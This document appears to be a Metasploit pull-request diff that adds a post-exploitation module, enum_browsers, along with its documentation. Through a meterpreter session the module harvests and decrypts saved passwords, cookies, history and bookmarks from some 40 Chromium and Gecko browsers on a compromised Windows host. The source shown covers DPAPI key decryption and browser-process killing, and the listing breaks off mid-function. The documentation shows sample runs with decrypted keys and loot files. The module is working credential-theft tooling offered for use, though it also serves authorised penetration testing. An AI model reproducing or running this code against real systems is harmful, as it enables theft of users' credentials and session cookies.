### PR TITLE
Add Browser Data Extraction for Chromium and Gecko Browsers

### DIFF
--- a/documentation/modules/post/windows/gather/enum_browsers.md
+++ b/documentation/modules/post/windows/gather/enum_browsers.md
@@ -1,0 +1,185 @@
+
+# Vulnerable Application
+
+This post-exploitation module extracts saved user data from various Chromium-based and Gecko-based browsers and decrypts sensitive information, such as passwords and cookies. The module can also extract history & bookmarks. Chromium encrypts sensitive data (e.g., passwords and cookies) using Windows Data Protection API (DPAPI), which can only be decrypted with the **same** logon credentials. This module uses the current user's credentials to decrypt the sensitive data unless specified otherwise.
+
+## Supported Browsers
+
+### Chromium-Based Browsers
+- Microsoft Edge
+- Google Chrome
+- Opera
+- Iridium
+- Brave
+- CentBrowser
+- Chedot
+- Orbitum
+- Comodo Dragon
+- Yandex Browser
+- 7Star
+- Torch
+- ChromePlus
+- Komet
+- Amigo
+- Sputnik
+- Citrio
+- 360Chrome
+- Uran
+- Liebao
+- Elements Browser
+- Epic Privacy Browser
+- CocCoc Browser
+- Sleipnir
+- QIP Surf
+- Coowon
+- Vivaldi
+
+### Gecko-Based Browsers
+- Mozilla Firefox
+- Thunderbird
+- SeaMonkey
+- BlackHawk
+- Cyberfox
+- K-Meleon
+- Icecat
+- Pale Moon
+- Comodo IceDragon
+- Waterfox
+- Postbox
+- Flock Browser
+
+## Verification Steps
+
+1. Start `msfconsole`.
+2. Obtain a meterpreter session on the target system.
+3. Run the module: `use post/windows/gather/enum_browsers`
+4. Set the appropriate session ID: `set SESSION <session id>`
+5. (Optional) Enable verbose mode if you want detailed output: `set VERBOSE true`
+6. (Optional) Kill browser processes before extraction to avoid file access issues: `set KILL_BROWSER true`
+7. Run the module: `run`
+8. You should see the extracted browser data in the loot files.
+
+## Options
+
+- **KILL_BROWSER** - Kills browser processes before data extraction. This can help avoid file access issues if the browser is running, particularly for cookies. Default is `false`.
+- **VERBOSE** - Prints more detailed output for each step, including encryption key extraction and DPAPI decryption. Default is `false`.
+- **SESSION** - The session to run the module on. Required.
+
+## Extracted Data
+
+The module extracts the following data from supported browsers:
+
+- **Login data** (username/passwords)
+- **Cookies** (decrypted)
+- **History** (URLs, titles, visit counts, last visit times)
+- **Bookmarks**
+
+The data is saved into separate loot files for each browser and data type, with filenames that include the extraction date, browser name, and data type for clarity.
+
+## Example Output
+
+### Meterpreter Session as Normal User
+
+```bash
+[*] Current user profile: C:\Users\ah
+[*] Found Microsoft Edge
+[+] └ Extracted Passwords to /root/.msf4/loot/20240921193101_default_192.168.0.29_MicrosoftEdge_p_679268.txt (395 bytes)
+[+] └ Extracted Cookies to /root/.msf4/loot/20240921193101_default_192.168.0.29_MicrosoftEdge_c_877807.txt (9088 bytes)
+[+] └ Extracted History to /root/.msf4/loot/20240921193102_default_192.168.0.29_MicrosoftEdge_h_673551.txt (507 bytes)
+[*] Found Brave
+[+] └ Extracted Passwords to /root/.msf4/loot/20240921193105_default_192.168.0.29_Brave_passwords_575498.txt (73261 bytes)
+[-] └ Cannot access Cookies. File in use by another process.
+[+] └ Extracted History to /root/.msf4/loot/20240921193119_default_192.168.0.29_Brave_history_439185.txt (2498413 bytes)
+[+] └ Extracted Bookmarks to /root/.msf4/loot/20240921193119_default_192.168.0.29_Brave_bookmarks_445491.txt (8601 bytes)
+[*] Found Mozilla Firefox
+[+] └ Extracted Logins to /root/.msf4/loot/20240921193123_default_192.168.0.29_MozillaFirefox__293343.json (522906 bytes)
+[+] └ Extracted Cookies to /root/.msf4/loot/20240921193124_default_192.168.0.29_MozillaFirefox__014088.txt (8215 bytes)
+[+] └ Extracted History to /root/.msf4/loot/20240921193128_default_192.168.0.29_MozillaFirefox__763526.txt (408097 bytes)
+[+] └ Extracted Bookmarks to /root/.msf4/loot/20240921193132_default_192.168.0.29_MozillaFirefox__322216.txt (9690 bytes)
+[*] Found Thunderbird
+[+] └ Extracted Logins to /root/.msf4/loot/20240921193133_default_192.168.0.29_Thunderbird_logi_351433.json (3136 bytes)
+[+] └ Extracted Cookies to /root/.msf4/loot/20240921193134_default_192.168.0.29_Thunderbird_cook_018921.txt (3200 bytes)
+[+] └ Extracted History to /root/.msf4/loot/20240921193137_default_192.168.0.29_Thunderbird_hist_367914.txt (3577 bytes)
+[+] └ Extracted Bookmarks to /root/.msf4/loot/20240921193141_default_192.168.0.29_Thunderbird_book_725692.txt (2 bytes)
+[*] Post module execution completed
+```
+
+### Using KILL_BROWSER to Resolve File Access Issues
+
+If the browser processes are running, cookies and other files may be locked and inaccessible. Use the `KILL_BROWSER` option to stop browsers before extraction:
+
+```bash
+msf6 post(windows/gather/enum_browsers) > set KILL_BROWSER true
+KILL_BROWSER => true
+msf6 post(windows/gather/enum_browsers) > run
+
+[*] Current user profile: C:\Users\ah
+[*] Found Microsoft Edge
+[+] └ Extracted Passwords to /root/.msf4/loot/20240921201057_default_192.168.0.29_MicrosoftEdge_p_232893.txt (395 bytes)
+[+] └ Extracted Cookies to /root/.msf4/loot/20240921201057_default_192.168.0.29_MicrosoftEdge_c_077883.txt (9088 bytes)
+[+] └ Extracted History to /root/.msf4/loot/20240921201058_default_192.168.0.29_MicrosoftEdge_h_507564.txt (507 bytes)
+[*] Found Brave
+[+] └ Extracted Passwords to /root/.msf4/loot/20240921201106_default_192.168.0.29_Brave_passwords_884652.txt (73261 bytes)
+[+] └ Extracted Cookies to /root/.msf4/loot/20240921201107_default_192.168.0.29_Brave_cookies_674752.txt (261116 bytes)
+[+] └ Extracted History to /root/.msf4/loot/20240921201121_default_192.168.0.29_Brave_history_006361.txt (2500006 bytes)
+[+] └ Extracted Bookmarks to /root/.msf4/loot/20240921201122_default_192.168.0.29_Brave_bookmarks_698530.txt (8601 bytes)
+[*] Found Mozilla Firefox
+[+] └ Extracted Logins to /root/.msf4/loot/20240921201125_default_192.168.0.29_MozillaFirefox__055989.json (522906 bytes)
+[+] └ Extracted Cookies to /root/.msf4/loot/20240921201126_default_192.168.0.29_MozillaFirefox__643594.txt (8215 bytes)
+[+] └ Extracted History to /root/.msf4/loot/20240921201130_default_192.168.0.29_MozillaFirefox__071330.txt (408097 bytes)
+[+] └ Extracted Bookmarks to /root/.msf4/loot/20240921201134_default_192.168.0.29_MozillaFirefox__633130.txt (9690 bytes)
+[*] Found Thunderbird
+[+] └ Extracted Logins to /root/.msf4/loot/20240921201134_default_192.168.0.29_Thunderbird_logi_562248.json (3136 bytes)
+[+] └ Extracted Cookies to /root/.msf4/loot/20240921201135_default_192.168.0.29_Thunderbird_cook_115306.txt (3200 bytes)
+[+] └ Extracted History to /root/.msf4/loot/20240921201139_default_192.168.0.29_Thunderbird_hist_108812.txt (3577 bytes)
+[+] └ Extracted Bookmarks to /root/.msf4/loot/20240921201143_default_192.168.0.29_Thunderbird_book_912944.txt (2 bytes)
+[*] Post module execution completed
+```
+
+This will kill any running browser processes and avoid file access issues.
+
+### Using VERBOSE Mode for Detailed Output
+
+If you want to see each step of the extraction and decryption process, enable verbose mode:
+
+```bash
+msf6 post(windows/gather/enum_browsers) > set VERBOSE true
+VERBOSE => true
+msf6 post(windows/gather/enum_browsers) > run
+
+[*] Current user profile: C:\Users\ah
+[*] Found Microsoft Edge
+[*] Getting encryption key from: C:\Users\ah\AppData\Local\Microsoft\Edge\\User Data\Local State
+[*] Encrypted key (Base64-decoded, hex): 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f74ba6ec3e4f774394b60c6be17156cb100000001e0000004d006900630072006f0073006f0066007400200045006400670065000000106600000001000020000000571587f33c18930a9c79ce75b7156c64d159a5e305204ca0d7d49215275428fa000000000e8000000002000020000000b4e331d5a62b6548e21ea4ecc630fb0ac3ed6dce39bc35c1e2cde61da6486ced30000000d65f5c3cb0591b058a69481e8e39b817de086e25d13d35c4d3450a31d2fc78fa6f2a47af19020963f13ae82b2967c4f34000000039a14221c9462dd252eee1df0ce0bdf7135a00d8a06ab6496bf4f957d196728165e2b3d982f35205c4adad3bd64954570a5f0018d90ec9dc23fb54af11080e86
+[*] Starting DPAPI decryption process
+[+] Decryption successful
+[+] Decrypted key (hex): 16c25d5e81e9f1b4729bc412e250f2fa5b2e5b90d7e439768694b1630490e670
+[+] └ Extracted Passwords to /root/.msf4/loot/20240921194816_default_192.168.0.29_MicrosoftEdge_p_903608.txt (395 bytes)
+[+] └ Extracted Cookies to /root/.msf4/loot/20240921194817_default_192.168.0.29_MicrosoftEdge_c_562771.txt (9088 bytes)
+[+] └ Extracted History to /root/.msf4/loot/20240921194817_default_192.168.0.29_MicrosoftEdge_h_074342.txt (507 bytes)
+[*] Found Brave
+[*] Getting encryption key from: C:\Users\ah\AppData\Local\BraveSoftware\Brave-Browser\\User Data\Local State
+[*] Encrypted key (Base64-decoded, hex): 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f74ba6ec3e4f774394b60c6be17156cb100000001c000000420072006100760065002000420072006f0077007300650072000000106600000001000020000000b1feb406d73aacc418e6048f0b7e1c54d97af7e6d343f8620fbcadf729ba7d5d000000000e8000000002000020000000c4ff71c562c25f380679b1a1bca886e5ef6f53b9e72d2392890c483608b991a1300000009edaa62eb3b99fbfca9aa6ad0a43da2ccfb2889aaba35458b9dd4163460de17733a169dd83658f9416fd11f5fc87733340000000239998fef8ca1d69824853411954f207df5f173a28c4b8505723a23e5698fa0352eb24435ea763839311cab42d269a9c2456c6c2e74c2edbe6001ad45b13d8b2
+[*] Starting DPAPI decryption process
+[+] Decryption successful
+[+] Decrypted key (hex): 131c159c5460a2e1cf40502794865da88789f6f96da77ec105cc0ee5b21ce632
+[+] └ Extracted Passwords to /root/.msf4/loot/20240921194820_default_192.168.0.29_Brave_passwords_463764.txt (73261 bytes)
+[-] └ Cannot access Cookies. File in use by another process.
+[+] └ Extracted History to /root/.msf4/loot/20240921194834_default_192.168.0.29_Brave_history_896256.txt (2499456 bytes)
+[+] └ Extracted Bookmarks to /root/.msf4/loot/20240921194835_default_192.168.0.29_Brave_bookmarks_159673.txt (8601 bytes)
+```
+This will show detailed information, such as:
+
+- The extraction of encryption keys from local state files.
+- The decryption of data using DPAPI.
+- Success or failure messages for each extraction step.
+
+## Potential Errors
+
+- **Cookies file in use**: If the cookies database is locked by the browser, you may encounter an error message similar to:
+
+  ```bash
+  [-] Cannot access Cookies. File in use by another process.
+  ```
+
+  You can resolve this by setting `KILL_BROWSER` to `true`.

--- a/modules/post/windows/gather/enum_browsers.rb
+++ b/modules/post/windows/gather/enum_browsers.rb
@@ -1,4 +1,3 @@
-require 'msf/core'
 require 'rex'
 require 'base64'
 require 'sqlite3'

--- a/modules/post/windows/gather/enum_browsers.rb
+++ b/modules/post/windows/gather/enum_browsers.rb
@@ -63,31 +63,45 @@ class MetasploitModule < Msf::Post
   # Browsers and paths taken from https://github.com/shaddy43/BrowserSnatch/
   def process_chromium_browsers(base_path)
     chromium_browsers = {
-      'Microsoft\\Edge\\' => 'Microsoft Edge', 'Google\\Chrome\\' => 'Google Chrome', 'Opera Software\\Opera Stable' => 'Opera',
-      'Iridium\\' => 'Iridium', 'Chromium\\' => 'Chromium', 'BraveSoftware\\Brave-Browser\\' => 'Brave',
-      'CentBrowser\\' => 'CentBrowser', 'Chedot\\' => 'Chedot', 'Orbitum\\' => 'Orbitum',
-      'Comodo\\Dragon\\' => 'Comodo Dragon', 'Yandex\\YandexBrowser\\' => 'Yandex Browser', '7Star\\7Star\\' => '7Star',
-      'Torch\\' => 'Torch', 'MapleStudio\\ChromePlus\\' => 'ChromePlus', 'Kometo\\' => 'Komet',
-      'Amigo\\' => 'Amigo', 'Sputnik\\Sputnik\\' => 'Sputnik', 'CatalinaGroup\\Citrio\\' => 'Citrio',
-      '360Chrome\\Chrome\\' => '360Chrome', 'uCozMedia\\Uran\\' => 'Uran', 'liebao\\' => 'Liebao',
-      'Elements Browser\\' => 'Elements Browser', 'Epic Privacy Browser\\' => 'Epic Privacy Browser',
-      'CocCoc\\Browser\\' => 'CocCoc Browser', 'Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer' => 'Sleipnir',
-      'QIP Surf\\' => 'QIP Surf', 'Coowon\\Coowon\\' => 'Coowon', 'Vivaldi\\' => 'Vivaldi'
+      'Microsoft\\Edge\\' => 'Microsoft Edge',
+      'Google\\Chrome\\' => 'Google Chrome',
+      'Opera Software\\Opera Stable' => 'Opera',
+      'Iridium\\' => 'Iridium',
+      'Chromium\\' => 'Chromium',
+      'BraveSoftware\\Brave-Browser\\' => 'Brave',
+      'CentBrowser\\' => 'CentBrowser',
+      'Chedot\\' => 'Chedot',
+      'Orbitum\\' => 'Orbitum',
+      'Comodo\\Dragon\\' => 'Comodo Dragon',
+      'Yandex\\YandexBrowser\\' => 'Yandex Browser',
+      '7Star\\7Star\\' => '7Star',
+      'Torch\\' => 'Torch',
+      'MapleStudio\\ChromePlus\\' => 'ChromePlus',
+      'Kometo\\' => 'Komet',
+      'Amigo\\' => 'Amigo',
+      'Sputnik\\Sputnik\\' => 'Sputnik',
+      'CatalinaGroup\\Citrio\\' => 'Citrio',
+      '360Chrome\\Chrome\\' => '360Chrome',
+      'uCozMedia\\Uran\\' => 'Uran',
+      'liebao\\' => 'Liebao',
+      'Elements Browser\\' => 'Elements Browser',
+      'Epic Privacy Browser\\' => 'Epic Privacy Browser',
+      'CocCoc\\Browser\\' => 'CocCoc Browser',
+      'Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer' => 'Sleipnir',
+      'QIP Surf\\' => 'QIP Surf',
+      'Coowon\\Coowon\\' => 'Coowon',
+      'Vivaldi\\' => 'Vivaldi'
     }
 
     chromium_browsers.each do |path, name|
       profile_path = "#{base_path}\\AppData\\Local\\#{path}\\User Data\\Default"
-
       next unless directory?(profile_path)
 
       print_status("Found #{name}")
-      if datastore['KILL_BROWSER'] == true
-        kill_browser_process(name)
-      end
+      kill_browser_process(name) if datastore['KILL_BROWSER']
 
       local_state = "#{base_path}\\AppData\\Local\\#{path}\\User Data\\Local State"
       encryption_key = get_encryption_key(local_state)
-
       extract_chromium_data(profile_path, encryption_key, name)
     end
   end
@@ -95,23 +109,26 @@ class MetasploitModule < Msf::Post
   # Browsers and paths taken from https://github.com/shaddy43/BrowserSnatch/
   def process_gecko_browsers(base_path)
     gecko_browsers = {
-      'Mozilla\\Firefox\\' => 'Mozilla Firefox', 'Thunderbird\\' => 'Thunderbird',
-      'Mozilla\\SeaMonkey\\' => 'SeaMonkey', 'NETGATE Technologies\\BlackHawk\\' => 'BlackHawk',
-      '8pecxstudios\\Cyberfox\\' => 'Cyberfox', 'K-Meleon\\' => 'K-Meleon',
-      'Mozilla\\icecat\\' => 'Icecat', 'Moonchild Productions\\Pale Moon\\' => 'Pale Moon',
-      'Comodo\\IceDragon\\' => 'Comodo IceDragon', 'Waterfox\\' => 'Waterfox', 'Postbox\\' => 'Postbox',
+      'Mozilla\\Firefox\\' => 'Mozilla Firefox',
+      'Thunderbird\\' => 'Thunderbird',
+      'Mozilla\\SeaMonkey\\' => 'SeaMonkey',
+      'NETGATE Technologies\\BlackHawk\\' => 'BlackHawk',
+      '8pecxstudios\\Cyberfox\\' => 'Cyberfox',
+      'K-Meleon\\' => 'K-Meleon',
+      'Mozilla\\icecat\\' => 'Icecat',
+      'Moonchild Productions\\Pale Moon\\' => 'Pale Moon',
+      'Comodo\\IceDragon\\' => 'Comodo IceDragon',
+      'Waterfox\\' => 'Waterfox',
+      'Postbox\\' => 'Postbox',
       'Flock\\Browser\\' => 'Flock Browser'
     }
 
     gecko_browsers.each do |path, name|
       profile_path = "#{base_path}\\AppData\\Roaming\\#{path}\\Profiles"
-
       next unless directory?(profile_path)
 
       print_status("Found #{name}")
-      if datastore['KILL_BROWSER'] == true
-        kill_browser_process(name)
-      end
+      kill_browser_process(name) if datastore['KILL_BROWSER']
 
       session.fs.dir.entries(profile_path).each do |profile|
         next if profile == '.' || profile == '..'
@@ -123,20 +140,38 @@ class MetasploitModule < Msf::Post
 
   def kill_browser_process(browser)
     browser_process_names = {
-      'Microsoft Edge' => 'msedge.exe', 'Google Chrome' => 'chrome.exe', 'Opera' => 'opera.exe',
-      'Iridium' => 'iridium.exe', 'Chromium' => 'chromium.exe', 'Brave' => 'brave.exe',
-      'CentBrowser' => 'centbrowser.exe', 'Chedot' => 'chedot.exe', 'Orbitum' => 'orbitum.exe',
-      'Comodo Dragon' => 'dragon.exe', 'Yandex Browser' => 'browser.exe', '7Star' => '7star.exe',
-      'Torch' => 'torch.exe', 'ChromePlus' => 'chromeplus.exe', 'Komet' => 'komet.exe',
-      'Amigo' => 'amigo.exe', 'Sputnik' => 'sputnik.exe', 'Citrio' => 'citrio.exe',
-      '360Chrome' => '360chrome.exe', 'Uran' => 'uran.exe', 'Liebao' => 'liebao.exe',
-      'Elements Browser' => 'elementsbrowser.exe', 'Epic Privacy Browser' => 'epic.exe',
-      'CocCoc Browser' => 'browser.exe', 'Sleipnir' => 'sleipnir.exe', 'QIP Surf' => 'qipsurf.exe',
-      'Coowon' => 'coowon.exe', 'Vivaldi' => 'vivaldi.exe'
+      'Microsoft Edge' => 'msedge.exe',
+      'Google Chrome' => 'chrome.exe',
+      'Opera' => 'opera.exe',
+      'Iridium' => 'iridium.exe',
+      'Chromium' => 'chromium.exe',
+      'Brave' => 'brave.exe',
+      'CentBrowser' => 'centbrowser.exe',
+      'Chedot' => 'chedot.exe',
+      'Orbitum' => 'orbitum.exe',
+      'Comodo Dragon' => 'dragon.exe',
+      'Yandex Browser' => 'browser.exe',
+      '7Star' => '7star.exe',
+      'Torch' => 'torch.exe',
+      'ChromePlus' => 'chromeplus.exe',
+      'Komet' => 'komet.exe',
+      'Amigo' => 'amigo.exe',
+      'Sputnik' => 'sputnik.exe',
+      'Citrio' => 'citrio.exe',
+      '360Chrome' => '360chrome.exe',
+      'Uran' => 'uran.exe',
+      'Liebao' => 'liebao.exe',
+      'Elements Browser' =>
+      'elementsbrowser.exe',
+      'Epic Privacy Browser' => 'epic.exe',
+      'CocCoc Browser' => 'browser.exe',
+      'Sleipnir' => 'sleipnir.exe',
+      'QIP Surf' => 'qipsurf.exe',
+      'Coowon' => 'coowon.exe',
+      'Vivaldi' => 'vivaldi.exe'
     }
 
     process_name = browser_process_names[browser]
-
     return unless process_name
 
     session.sys.process.get_processes.each do |process|
@@ -154,7 +189,6 @@ class MetasploitModule < Msf::Post
 
   def decrypt_data(encrypted_data)
     print_status('Starting DPAPI decryption process.') if datastore['VERBOSE']
-
     begin
       mem = session.railgun.kernel32.LocalAlloc(0, encrypted_data.length)['return']
       raise 'Memory allocation failed.' if mem == 0
@@ -170,17 +204,14 @@ class MetasploitModule < Msf::Post
       end
 
       pdatain = [encrypted_data.length, mem].pack(inout_fmt)
-
       ret = session.railgun.crypt32.CryptUnprotectData(
         pdatain, nil, nil, nil, nil, 0, 2048
       )
-
       len, addr = ret['pDataOut'].unpack(inout_fmt)
       decrypted_data = len == 0 ? nil : session.railgun.memread(addr, len)
 
       session.railgun.kernel32.LocalFree(mem)
       session.railgun.kernel32.LocalFree(addr) if addr != 0
-
       print_good('Decryption successful.') if datastore['VERBOSE']
       return decrypted_data.strip
     rescue StandardError => e
@@ -191,7 +222,6 @@ class MetasploitModule < Msf::Post
 
   def get_encryption_key(local_state_path)
     print_status("Getting encryption key from: #{local_state_path}") if datastore['VERBOSE']
-
     if file?(local_state_path)
       local_state = read_file(local_state_path)
       json_state = begin
@@ -199,7 +229,6 @@ class MetasploitModule < Msf::Post
       rescue StandardError
         nil
       end
-
       if json_state.nil?
         print_error('Failed to parse JSON from Local State file.')
         return nil
@@ -212,19 +241,16 @@ class MetasploitModule < Msf::Post
         rescue StandardError
           nil
         end
-
         if encrypted_key_bin.nil?
           print_error('Failed to Base64 decode the encrypted key.')
           return nil
         end
 
         print_status("Encrypted key (Base64-decoded, hex): #{encrypted_key_bin.unpack('H*').first}") if datastore['VERBOSE']
-
         decrypted_key = decrypt_data(encrypted_key_bin)
 
         if decrypted_key.nil? || decrypted_key.length != 32
           print_error("Decrypted key is not 32 bytes: #{decrypted_key.nil? ? 'nil' : decrypted_key.length} bytes") if datastore['VERBOSE']
-
           if decrypted_key.length == 31
             print_status('Decrypted key is 31 bytes, attempting to pad key for decryption.') if datastore['VERBOSE']
             decrypted_key += "\x00"
@@ -232,7 +258,6 @@ class MetasploitModule < Msf::Post
             return nil
           end
         end
-
         print_good("Decrypted key (hex): #{decrypted_key.unpack('H*').first}") if datastore['VERBOSE']
         return decrypted_key
       else
@@ -270,7 +295,6 @@ class MetasploitModule < Msf::Post
       aes.key = key
       aes.iv = iv
       aes.auth_tag = tag
-
       decrypted_password = aes.update(ciphertext) + aes.final
       return decrypted_password
     rescue OpenSSL::Cipher::CipherError
@@ -303,7 +327,6 @@ class MetasploitModule < Msf::Post
     end
 
     extract_sql_data("#{profile_path}\\History", 'SELECT url, title, visit_count, last_visit_time FROM urls', 'history', browser)
-
     extract_json_bookmarks("#{profile_path}\\Bookmarks", 'bookmarks', browser)
   end
 
@@ -320,7 +343,6 @@ class MetasploitModule < Msf::Post
       bookmarks_json = JSON.parse(bookmarks_data)
 
       bookmarks = []
-
       if bookmarks_json['roots']['bookmark_bar']
         traverse_bookmarks(bookmarks_json['roots']['bookmark_bar'], bookmarks)
       end
@@ -335,13 +357,9 @@ class MetasploitModule < Msf::Post
       if bookmarks.any?
         bookmark_entries = bookmarks.map { |bookmark| "#{bookmark[:name]}: #{bookmark[:url]}" }.join("\n")
         file_name = store_loot("#{browser_clean}_#{data_type}", 'text/plain', session, bookmark_entries, "#{timestamp}_#{ip}_#{browser_clean}_#{data_type}.txt", "#{browser_clean} #{data_type.capitalize}")
-
         file_size = ::File.size(file_name)
-
         print_good("└ Extracted #{data_type.capitalize} to #{file_name} (#{file_size} bytes)")
       end
-    else
-      print_error("Bookmarks file not found at #{bookmarks_path}")
     end
   end
 
@@ -382,9 +400,7 @@ class MetasploitModule < Msf::Post
         timestamp = Time.now.strftime('%Y%m%d%H%M')
         ip = session.sock.peerhost
         file_name = store_loot("#{browser_clean}_#{data_type}", 'text/plain', session, result, "#{timestamp}_#{ip}_#{browser_clean}_#{data_type}.txt", "#{browser_clean} #{data_type.capitalize}")
-
         file_size = ::File.size(file_name)
-
         print_good("└ Extracted #{data_type.capitalize} to #{file_name} (#{file_size} bytes)")
       ensure
         db.close
@@ -396,16 +412,12 @@ class MetasploitModule < Msf::Post
   def extract_json_data(json_path, data_type, browser)
     if file?(json_path)
       json_data = read_file(json_path)
-
       browser_clean = browser.gsub('\\', '_').chomp('_')
       timestamp = Time.now.strftime('%Y%m%d%H%M')
       ip = session.sock.peerhost
       file_name = store_loot("#{browser_clean}_#{data_type}", 'application/json', session, json_data, "#{timestamp}_#{ip}_#{browser_clean}_#{data_type}.json", "#{browser_clean} #{data_type.capitalize}")
-
       file_size = ::File.size(file_name)
-
       print_good("└ Extracted #{data_type.capitalize} to #{file_name} (#{file_size} bytes)")
     end
   end
-
 end

--- a/modules/post/windows/gather/enum_browsers.rb
+++ b/modules/post/windows/gather/enum_browsers.rb
@@ -1,0 +1,394 @@
+require 'msf/core'
+require 'rex'
+require 'base64'
+require 'sqlite3'
+
+IV_SIZE = 12
+TAG_SIZE = 16
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Windows::UserProfiles
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Advanced Browser Data Extraction for Chromium and Gecko Browsers',
+        'Description' => %q{
+          This module extracts sensitive browser data such as passwords, cookies, and history from Chromium-based and Gecko-based
+          browsers on the target system. It decrypts passwords using Windows DPAPI, and provides the option to kill the browser
+          processes to ensure data extraction.
+        },
+        'License' => MSF_LICENSE,
+        'Platform' => ['win'],
+        'Arch' => [ ARCH_X64, ARCH_X86 ],
+        'Targets' => [['Windows', {}]],
+        'SessionTypes' => ['meterpreter'],
+        'Author' => ['Alexander "xaitax" Hagenah'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptBool.new('KILL_BROWSER', [false, 'Kill browser processes before extracting data', false]),
+    ])
+  end
+
+  def run
+    if session.type != 'meterpreter'
+      print_error('This module requires a meterpreter session')
+      return
+    end
+
+    user_profile = get_env('USERPROFILE')
+    if user_profile.nil? || user_profile.empty?
+      print_error('Could not determine the current user profile directory')
+      return
+    end
+
+    print_status("Current user profile: #{user_profile}")
+
+    process_chromium_browsers(user_profile)
+    process_gecko_browsers(user_profile)
+  end
+
+  # Browsers and paths taken from https://github.com/shaddy43/BrowserSnatch/
+  def process_chromium_browsers(base_path)
+    chromium_browsers = {
+      'Microsoft\\Edge\\' => 'Microsoft Edge', 'Google\\Chrome\\' => 'Google Chrome', 'Opera Software\\Opera Stable' => 'Opera',
+      'Iridium\\' => 'Iridium', 'Chromium\\' => 'Chromium', 'BraveSoftware\\Brave-Browser\\' => 'Brave',
+      'CentBrowser\\' => 'CentBrowser', 'Chedot\\' => 'Chedot', 'Orbitum\\' => 'Orbitum',
+      'Comodo\\Dragon\\' => 'Comodo Dragon', 'Yandex\\YandexBrowser\\' => 'Yandex Browser', '7Star\\7Star\\' => '7Star',
+      'Torch\\' => 'Torch', 'MapleStudio\\ChromePlus\\' => 'ChromePlus', 'Kometo\\' => 'Komet',
+      'Amigo\\' => 'Amigo', 'Sputnik\\Sputnik\\' => 'Sputnik', 'CatalinaGroup\\Citrio\\' => 'Citrio',
+      '360Chrome\\Chrome\\' => '360Chrome', 'uCozMedia\\Uran\\' => 'Uran', 'liebao\\' => 'Liebao',
+      'Elements Browser\\' => 'Elements Browser', 'Epic Privacy Browser\\' => 'Epic Privacy Browser',
+      'CocCoc\\Browser\\' => 'CocCoc Browser', 'Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer' => 'Sleipnir',
+      'QIP Surf\\' => 'QIP Surf', 'Coowon\\Coowon\\' => 'Coowon', 'Vivaldi\\' => 'Vivaldi'
+    }
+
+    chromium_browsers.each do |path, name|
+      profile_path = "#{base_path}\\AppData\\Local\\#{path}\\User Data\\Default"
+
+      next unless directory?(profile_path)
+
+      print_status("Found #{name}")
+      if datastore['KILL_BROWSER'] == true
+        kill_browser_process(name)
+      end
+
+      local_state = "#{base_path}\\AppData\\Local\\#{path}\\User Data\\Local State"
+      encryption_key = get_encryption_key(local_state)
+
+      extract_chromium_data(profile_path, encryption_key, name)
+    end
+  end
+
+  # Browsers and paths taken from https://github.com/shaddy43/BrowserSnatch/
+  def process_gecko_browsers(base_path)
+    gecko_browsers = {
+      'Mozilla\\Firefox\\' => 'Mozilla Firefox', 'Thunderbird\\' => 'Thunderbird',
+      'Mozilla\\SeaMonkey\\' => 'SeaMonkey', 'NETGATE Technologies\\BlackHawk\\' => 'BlackHawk',
+      '8pecxstudios\\Cyberfox\\' => 'Cyberfox', 'K-Meleon\\' => 'K-Meleon',
+      'Mozilla\\icecat\\' => 'Icecat', 'Moonchild Productions\\Pale Moon\\' => 'Pale Moon',
+      'Comodo\\IceDragon\\' => 'Comodo IceDragon', 'Waterfox\\' => 'Waterfox', 'Postbox\\' => 'Postbox',
+      'Flock\\Browser\\' => 'Flock Browser'
+    }
+
+    gecko_browsers.each do |path, name|
+      profile_path = "#{base_path}\\AppData\\Roaming\\#{path}\\Profiles"
+
+      next unless directory?(profile_path)
+
+      print_status("Found #{name}")
+      if datastore['KILL_BROWSER'] == true
+        kill_browser_process(name)
+      end
+
+      session.fs.dir.entries(profile_path).each do |profile|
+        next if profile == '.' || profile == '..'
+
+        extract_gecko_data("#{profile_path}\\#{profile}", name)
+      end
+    end
+  end
+
+  def kill_browser_process(browser)
+    browser_process_names = {
+      'Microsoft Edge' => 'msedge.exe', 'Google Chrome' => 'chrome.exe', 'Opera' => 'opera.exe',
+      'Iridium' => 'iridium.exe', 'Chromium' => 'chromium.exe', 'Brave' => 'brave.exe',
+      'CentBrowser' => 'centbrowser.exe', 'Chedot' => 'chedot.exe', 'Orbitum' => 'orbitum.exe',
+      'Comodo Dragon' => 'dragon.exe', 'Yandex Browser' => 'browser.exe', '7Star' => '7star.exe',
+      'Torch' => 'torch.exe', 'ChromePlus' => 'chromeplus.exe', 'Komet' => 'komet.exe',
+      'Amigo' => 'amigo.exe', 'Sputnik' => 'sputnik.exe', 'Citrio' => 'citrio.exe',
+      '360Chrome' => '360chrome.exe', 'Uran' => 'uran.exe', 'Liebao' => 'liebao.exe',
+      'Elements Browser' => 'elementsbrowser.exe', 'Epic Privacy Browser' => 'epic.exe',
+      'CocCoc Browser' => 'browser.exe', 'Sleipnir' => 'sleipnir.exe', 'QIP Surf' => 'qipsurf.exe',
+      'Coowon' => 'coowon.exe', 'Vivaldi' => 'vivaldi.exe'
+    }
+
+    process_name = browser_process_names[browser]
+
+    return unless process_name
+
+    session.sys.process.get_processes.each do |process|
+      next unless process['name'].downcase == process_name.downcase
+
+      begin
+        session.sys.process.kill(process['pid'])
+      rescue Rex::Post::Meterpreter::RequestError
+        next
+      end
+    end
+
+    sleep(5)
+  end
+
+  def decrypt_data(encrypted_data)
+    print_status('Starting DPAPI decryption process') if datastore['VERBOSE']
+
+    begin
+      mem = session.railgun.kernel32.LocalAlloc(0, encrypted_data.length)['return']
+      raise 'Memory allocation failed' if mem == 0
+
+      session.railgun.memwrite(mem, encrypted_data)
+
+      if session.arch == ARCH_X86
+        inout_fmt = 'V2'
+      elsif session.arch == ARCH_X64
+        inout_fmt = 'Q2'
+      else
+        fail_with(Failure::NoTarget, "Unsupported architecture: #{session.arch}")
+      end
+
+      pdatain = [encrypted_data.length, mem].pack(inout_fmt)
+
